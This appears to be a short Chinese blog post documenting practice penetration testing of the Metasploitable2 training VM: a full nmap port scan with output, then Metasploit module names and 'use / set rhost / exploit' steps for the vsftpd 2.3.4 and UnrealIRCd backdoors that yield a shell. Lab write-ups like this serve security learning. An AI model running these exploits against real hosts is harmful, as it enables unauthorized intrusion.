login每天学习一点点,每天进步一点点.
当前位置:首页 >> metasploitable演练系统实战

metasploitable演练系统实战

2013-12-20 10:34:56  |  分类: Metasploit |  标签: metasploit  阅读(132)评论(0)
演练系统下载地址
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

一、端口扫描
root@bt:~# nmap -p0-65534 192.168.159.129
Starting Nmap 6.40 ( http://nmap.org ) at 2013-12-20 10:12 CST
Nmap scan report for 192.168.159.129
Host is up (0.00032s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  unknown
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  unknown
34625/tcp open  unknown
44997/tcp open  unknown
47588/tcp open  unknown
53325/tcp open  unknown
MAC Address: 00:0C:29:38:D3:AB (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.80 seconds

二、针对不同端口测试不同利用程序
21端口利用exp为unix/ftp/vsftpd_234_backdoor
25端口    linux/smtp/exim4_dovecot_exec     //提示服务未启动利用失败
6667端口利用unix/irc/unreal_ircd_3281_backdoor
步骤
use unix/ftp/vsftpd_234_backdoor
set rhost 192.168.**.**
exploit
即可得到shell
上一篇:ubuntu使用nmap查询端口 下一篇:ThinkPHP5 的视图$view->fetch()和$view->display()的区别

猜你喜欢

发表评论:

0.181831s